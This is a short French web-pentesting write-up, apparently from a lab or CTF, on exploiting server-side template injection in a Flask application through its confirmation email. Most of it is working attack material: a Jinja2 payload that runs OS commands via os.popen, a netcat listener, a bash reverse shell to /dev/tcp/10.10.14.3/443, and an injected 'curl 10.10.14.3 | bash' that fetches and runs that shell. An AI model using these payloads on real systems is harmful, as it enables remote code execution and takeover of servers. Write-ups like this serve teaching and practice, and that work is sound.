SSTI + mail (Flask) - Pentesting Web

Vulnérabilité SSTI :

En observant la configuration, nous remarquons que si nous changeons notre nom de configuration, un email de confirmation est envoyé. Cela peut être une opportunité pour une attaque SSTI.

Nous testons avec un payload typique :

{{ 9*9 }}

Si le résultat est 81, l'application est vulnérable.

Nous confirmons que l'application est vulnérable et testons l'injection de commandes avec un payload issu de payloadallthethings :

GitHub - swisskyrepo/PayloadsAllTheThings: A list of useful payloads and bypass for Web Application Security and Pentest/CTFGitHub

Commande ID:

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}

Nous réussissons à exécuter une reverse shell en écoutant sur le port 443 :

nc -nlvp 443

Nous créons un fichier index.html avec le contenu suivant pour exécuter une reverse shell

#!/bin/bash 
bash -i >& /dev/tcp/10.10.14.3/443 0>&1

Puis nous démarrons un serveur HTTP avec Python :

python3 -m http.server 80

Nous envoyons le payload avec curl pour récupérer et exécuter la commande :

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('curl 10.10.14.3 | bash').read() }}

Mis à jour il y a 12 mois

Ce contenu vous a-t-il été utile ?